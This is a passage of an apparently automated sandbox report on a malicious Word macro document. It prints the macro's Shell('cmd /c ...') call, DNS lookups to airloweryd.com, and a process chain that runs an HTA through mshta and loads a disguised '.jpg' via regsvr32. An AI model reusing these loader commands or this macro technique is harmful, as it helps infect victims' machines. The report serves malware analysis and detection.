                Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 35 03 00 00 00 00 00 00 01 00 00 00 25 82 5a bb 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                Function
                Shell("cmd
                Attribute
                VB_Name
                "buttSwap"
                windowLst)
                arrayObjectButt
                arrayObjectButt()
                VBA Code
                Attribute VB_Name = "buttSwap"
                Function arrayObjectButt()
                arrayObjectButt = Shell("cmd /c " & windowLst)
                
                End Function

                Streams

                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 459
                General
                Stream Path:PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:459
                Entropy:5.38200596711
                Base64 Encoded:True
                Data ASCII:I D = " { 4 E 6 C 1 6 6 D - 1 C 7 B - 4 2 6 B - 9 C C C - 3 0 C 0 6 8 5 F 4 1 D F } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = b o x P a s t e N e x t . . M o d u l e = b u t t S w a p . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 F 9 D 6 5 9 C 7 B A C 8 2 B 0 8 2 B 0 8 2 B 0 8 2 B 0 " . . D P B = " A A A 8 5 0 A 9 5 A A A 5 A A A 5 A " . . G C = " B 5 B 7 4
                Data Raw:49 44 3d 22 7b 34 45 36 43 31 36 36 44 2d 31 43 37 42 2d 34 32 36 42 2d 39 43 43 43 2d 33 30 43 30 36 38 35 46 34 31 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 62 6f 78 50 61 73 74 65 4e 65 78 74 0d 0a 4d 6f 64 75 6c 65 3d 62 75 74 74 53 77 61 70 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65
                Stream Path: PROJECTwm, File Type: data, Stream Size: 107
                General
                Stream Path:PROJECTwm
                File Type:data
                Stream Size:107
                Entropy:3.43250959943
                Base64 Encoded:False
                Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . b o x P a s t e N e x t . b . o . x . P . a . s . t . e . N . e . x . t . . . b u t t S w a p . b . u . t . t . S . w . a . p . . . . .
                Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 62 6f 78 50 61 73 74 65 4e 65 78 74 00 62 00 6f 00 78 00 50 00 61 00 73 00 74 00 65 00 4e 00 65 00 78 00 74 00 00 00 62 75 74 74 53 77 61 70 00 62 00 75 00 74 00 74 00 53 00 77 00 61 00 70 00 00 00 00 00
                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2785
                General
                Stream Path:VBA/_VBA_PROJECT
                File Type:data
                Stream Size:2785
                Entropy:4.16324625344
                Base64 Encoded:False
                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1699
                General
                Stream Path:VBA/__SRP_0
                File Type:data
                Stream Size:1699
                Entropy:3.60340858827
                Base64 Encoded:False
                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . ] . I > . ] % O . L . . . f . ! . . . . . . . . . . .
                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 190
                General
                Stream Path:VBA/__SRP_1
                File Type:data
                Stream Size:190
                Entropy:1.69732927545
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 532
                General
                Stream Path:VBA/__SRP_2
                File Type:data
                Stream Size:532
                Entropy:2.02890248311
                Base64 Encoded:False
                Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` i . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 156
                General
                Stream Path:VBA/__SRP_3
                File Type:data
                Stream Size:156
                Entropy:1.78206636307
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 e1 0d 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                Stream Path: VBA/dir, File Type: data, Stream Size: 619
                General
                Stream Path:VBA/dir
                File Type:data
                Stream Size:619
                Entropy:6.4433751069
                Base64 Encoded:True
                Data ASCII:. g . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . .
                Data Raw:01 67 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 80 87 e6 62 0c 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                07/22/21-11:01:07.680252ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                07/22/21-11:01:08.693819ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                Network Port Distribution

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 22, 2021 11:01:04.599126101 CEST5219753192.168.2.228.8.8.8
                Jul 22, 2021 11:01:05.609379053 CEST5219753192.168.2.228.8.8.8
                Jul 22, 2021 11:01:06.623332024 CEST5219753192.168.2.228.8.8.8
                Jul 22, 2021 11:01:06.670084000 CEST53521978.8.8.8192.168.2.22
                Jul 22, 2021 11:01:07.680150032 CEST53521978.8.8.8192.168.2.22
                Jul 22, 2021 11:01:08.693541050 CEST53521978.8.8.8192.168.2.22

                ICMP Packets

                TimestampSource IPDest IPChecksumCodeType
                Jul 22, 2021 11:01:07.680252075 CEST192.168.2.228.8.8.8d004(Port unreachable)Destination Unreachable
                Jul 22, 2021 11:01:08.693819046 CEST192.168.2.228.8.8.8d004(Port unreachable)Destination Unreachable

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Jul 22, 2021 11:01:04.599126101 CEST192.168.2.228.8.8.80xa163Standard query (0)airloweryd.comA (IP address)IN (0x0001)
                Jul 22, 2021 11:01:05.609379053 CEST192.168.2.228.8.8.80xa163Standard query (0)airloweryd.comA (IP address)IN (0x0001)
                Jul 22, 2021 11:01:06.623332024 CEST192.168.2.228.8.8.80xa163Standard query (0)airloweryd.comA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Jul 22, 2021 11:01:06.670084000 CEST8.8.8.8192.168.2.220xa163Server failure (2)airloweryd.comnonenoneA (IP address)IN (0x0001)
                Jul 22, 2021 11:01:07.680150032 CEST8.8.8.8192.168.2.220xa163Server failure (2)airloweryd.comnonenoneA (IP address)IN (0x0001)
                Jul 22, 2021 11:01:08.693541050 CEST8.8.8.8192.168.2.220xa163Server failure (2)airloweryd.comnonenoneA (IP address)IN (0x0001)

                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:11:00:32
                Start date:22/07/2021
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                Imagebase:0x13fff0000
                File size:1424032 bytes
                MD5 hash:95C38D04597050285A18F66039EDB456
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:11:00:33
                Start date:22/07/2021
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c c:\programdata\captionEx.hta
                Imagebase:0x4a150000
                File size:345088 bytes
                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:11:00:34
                Start date:22/07/2021
                Path:C:\Windows\SysWOW64\mshta.exe
                Wow64 process (32bit):true
                Commandline:'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta'
                Imagebase:0x12a0000
                File size:13312 bytes
                MD5 hash:ABDFC692D9FE43E2BA8FE6CB5A8CB95A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Start time:11:00:41
                Start date:22/07/2021
                Path:C:\Windows\SysWOW64\regsvr32.exe
                Wow64 process (32bit):true
                Commandline:'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg
                Imagebase:0xb20000
                File size:14848 bytes
                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Disassembly

                Code Analysis

                Reset < >

                  Executed Functions

                  Memory Dump Source
                  • Source File: 00000004.00000003.2089356644.0000000002BB0000.00000010.00000001.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_3_2bb0000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e47f303a382ad0880902813a794b8d8eaeada31577e34fb4e59e7681d8cae2c4
                  • Instruction ID: bced735342f25a37f184463c0520c27a4c4edc94579dab05345ee068ca3dedc6
                  • Opcode Fuzzy Hash: e47f303a382ad0880902813a794b8d8eaeada31577e34fb4e59e7681d8cae2c4
                  • Instruction Fuzzy Hash: 5C41B130A08208DFDB15DF84C985BFEB7B0FF49714F108489E9862B291C7B0A955CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.2089381180.00000000029F0000.00000010.00000001.sdmp, Offset: 029F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_3_29f0000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction ID: 7b1ff3fded13df51bd771fc2bb42c5f6d4d9ed887a962a8632dedbee2437bf7b
                  • Opcode Fuzzy Hash: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.2089381180.00000000029F0000.00000010.00000001.sdmp, Offset: 029F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_3_29f0000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction ID: 7b1ff3fded13df51bd771fc2bb42c5f6d4d9ed887a962a8632dedbee2437bf7b
                  • Opcode Fuzzy Hash: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.2089381180.00000000029F0000.00000010.00000001.sdmp, Offset: 029F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_3_29f0000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction ID: 7b1ff3fded13df51bd771fc2bb42c5f6d4d9ed887a962a8632dedbee2437bf7b
                  • Opcode Fuzzy Hash: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.2089381180.00000000029F0000.00000010.00000001.sdmp, Offset: 029F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_3_29f0000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction ID: 7b1ff3fded13df51bd771fc2bb42c5f6d4d9ed887a962a8632dedbee2437bf7b
                  • Opcode Fuzzy Hash: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.2089381180.00000000029F0000.00000010.00000001.sdmp, Offset: 029F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_3_29f0000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction ID: 7b1ff3fded13df51bd771fc2bb42c5f6d4d9ed887a962a8632dedbee2437bf7b
                  • Opcode Fuzzy Hash: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.2089381180.00000000029F0000.00000010.00000001.sdmp, Offset: 029F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_3_29f0000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction ID: 7b1ff3fded13df51bd771fc2bb42c5f6d4d9ed887a962a8632dedbee2437bf7b
                  • Opcode Fuzzy Hash: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.2089381180.00000000029F0000.00000010.00000001.sdmp, Offset: 029F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_3_29f0000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction ID: 7b1ff3fded13df51bd771fc2bb42c5f6d4d9ed887a962a8632dedbee2437bf7b
                  • Opcode Fuzzy Hash: b1c93e654d3a28586c6a9098a9ab65cc5419afecc745d59d2a44847317440395
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions